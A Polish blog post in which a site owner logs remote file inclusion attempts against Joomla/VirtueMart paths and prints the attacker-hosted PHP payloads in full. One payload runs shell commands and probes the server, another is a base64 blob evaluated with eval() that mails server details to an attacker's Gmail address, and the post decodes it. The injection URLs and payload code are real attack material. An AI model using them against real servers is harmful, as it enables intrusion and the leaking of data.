haker, hacker, kraker, cracker
Prawie jak jeden chuj, podobno prawie robi wielką różnice… podobno to takie względne…
nurtujący tytuł… Kolejne ciekawe wirusowe skrypty, lub tylko avast świruje.
//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=
Takim zapytaniem ktoś próbował coś zdziałać://administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cimagro.com.ar///administrator/components/com_virtuemart/id.txt?
Avast rozpoznaje jako: PHP:Agent-J [Trj] – Koń Trojański – infekuje cache przeglądarki: _CACHE_, _CACHE_001_ itp.
Cały ko źródłowy z pliku id.txt:
<?php //Coracore Response $pwd1 = @getcwd(); $un = @php_uname(); $os = @PHP_OS; $id1 = ex("id"); if (empty($id1)) { $id1 = @get_current_user(); } $sof1 = @getenv("SERVER_SOFTWARE"); $php1 = @phpversion(); $name1 = $_SERVER['SERVER_NAME']; $ip1 = @gethostbyname($SERVER_ADDR); $free1 = @diskfreespace($pwd1); $all1 = disk_total_space($pwd1); $used = ConvertBytes($all1 - $free1); $free = ConvertBytes(@diskfreespace($pwd1)); if (!$free) { $free = 0; } $all = ConvertBytes(@disk_total_space($pwd1)); if (!$all) { $all = 0; } if (@is_writable($pwd1)) { $perm = "[W]"; } else { $perm = "[R]"; } if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $sf = "ON"; } else { $sf = "OFF"; } echo "Coracore" . $sf . "<br>"; echo "uname -a: $un<br>"; echo "os: $os<br>"; echo "id: $id1<br>"; echo "pwd: $pwd1<br>"; echo "php: $php1<br>"; echo "software: $sof1<br>"; echo "srvip: $ip1<br>"; echo "srvname: $name1<br>"; echo "free: $free<br>"; echo "used: $used<br>"; echo "total: $all $perm<br>"; function ConvertBytes($number) { $len = strlen($number); if ($len < 4) { return sprintf("%d b", $number); } if ($len >= 4 && $len <= 6) { return sprintf("%0.2f Kb", $number / 1024); } if ($len >= 7 && $len <= 9) { return sprintf("%0.2f Mb", $number / 1024 / 1024); } return sprintf("%0.2f Gb", $number / 1024 / 1024 / 1024); } function ex($cfe) { $res = ''; if (!empty($cfe)) { if (function_exists('exec')) { @exec($cfe, $res); $res = join("\n", $res); } elseif (function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif (function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif (function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif (@is_resource($f = @popen($cfe, "r"))) { $res = ""; while (!@feof($f)) { $res .= @ fread($f, 1024); } @pclose($f); } else { $res = "NULL"; } } return $res; } ?> <?php $lmge = "JGNyZWF0b3I9YmFzZTY0X2RlY29kZSgiWm5Jek0zTm9NMnhzUUdkdFlXbHNMbU52YlE9PSIpOw0KKCRzYWZlX21vZGUpPygkc2FmZXo9Ik9OIik6KCRzYWZlej0iT0ZGX0hFSEUiKTsNCiRiYXNlPSJodHRwOi8vIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107IA0KJG5hbWUgPSBwaHBfdW5hbWUoKTsgJGlwID0gZ2V0ZW52KCJSRU1PVEVfQUREUiIpOyAkaXAyID0gZ2V0aG9zdGJ5YWRkcigkX1NFUlZFUltSRU1PVEVfQUREUl0pOyAkc3ViaiA9ICRfU0VSVkVSWydIVFRQX0hPU1QnXTsgDQokbXNnID0gIlxuQkFTRTogJGJhc2VcbnVuYW1lIGE6ICRuYW1lXG5CeXBhc3M6ICRieXBhc3NlclxuSVA6ICRpcFxuSG9zdDogJGlwMiAkcHdkcyI7DQokZnJvbSA9IkZyb206ICIuJHdyaXQuIl9fXz0iLiRzYWZlei4iPHRvb2xAIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uIj4iOw0KbWFpbCggJGNyZWF0b3IsICRzdWJqLCAkbXNnLCAkZnJvbSk7"; eval(base64_decode($lmge)); exit; ?> |
Zawartość zmiennej $lmge po zdekodowaniu (base64_decode) – oczywiście kod jest wykonywany przez eval():
$creator = base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ=="); ($safe_mode) ? ($safez = "ON") : ($safez = "OFF_HEHE"); $base = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; $name = php_uname(); $ip = getenv("REMOTE_ADDR"); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST']; $msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds"; $from = "From: " . $writ . "___=" . $safez . "<tool@" . $_SERVER['HTTP_HOST'] . ">"; mail($creator, $subj, $msg, $from); |
Zawartość zmiennej $creator po zdekodowaniu (base64_decode):fr33sh3ll@gmail.com
?_SERVER[DOCUMENT_ROOT]=
Tym razem zapytanie wykorzystywało tablicę super / auto globalną $_SERVER a dokładniej: $_SERVER[DOCUMENT_ROOT] albo tylko mi się tak wydaje. Całe zapytanie:?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt???
Avast rozpoznał jako: PHP:Small-B [Trj], zwartość readme.txt:
<?php echo "Mic22"; $cmd = "id"; $eseguicmd = ex($cmd); echo $eseguicmd; function ex($cfe) { $res = ''; if (!empty($cfe)) { if (function_exists('exec')) { @exec($cfe, $res); $res = join("\n", $res); } elseif (function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif (function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif (function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif (@is_resource($f = @popen($cfe, "r"))) { $res = ""; while (!@feof($f)) { $res .= @ fread($f, 1024); } @pclose($f); } } return $res; } exit; |
index2.php/administrator?mosConfig_absolute_path=
Całe zapytanie:index2.php/administrator?mosConfig_absolute_path=http://www.inflightservice.se/sas/id.txt??
Avast alarmuje: PHP:Agent-K [Trj], Koń Trojański, – infekuje cache przeglądarki: _CACHE_, _CACHE_001_ itp.
Kod id.txt:
<? echo "klepek_klepek<br>"; $alb = @php_uname(); $alb2 = system(uptime); $alb3 = system(id); $alb4 = @getcwd(); $alb5 = getenv("SERVER_SOFTWARE"); $alb6 = phpversion(); $alb7 = $_SERVER['SERVER_NAME']; $alb8 = gethostbyname($SERVER_ADDR); $alb9 = get_current_user(); $os = @PHP_OS; echo "os: $os<br>"; echo "uname -a: $alb<br>"; echo "uptime: $alb2<br>"; echo "id: $alb3<br>"; echo "pwd: $alb4<br>"; echo "user: $alb9<br>"; echo "phpv: $alb6<br>"; echo "SoftWare: $alb5<br>"; echo "ServerName: $alb7<br>"; echo "ServerAddr: $alb8<br>"; echo "NigeriaN HackerS TeaM<br>"; exit; ?> |
O co w tym chodzi…
Sam nie wiem, mogę tylko myśleć lecz nie odczuwam takiej potrzeby. Nigeryjscy hakerzy atakują.
Swoją drogą wszystko wykonane poprzez: libwww-perl/5.79
Najnowsze komentarze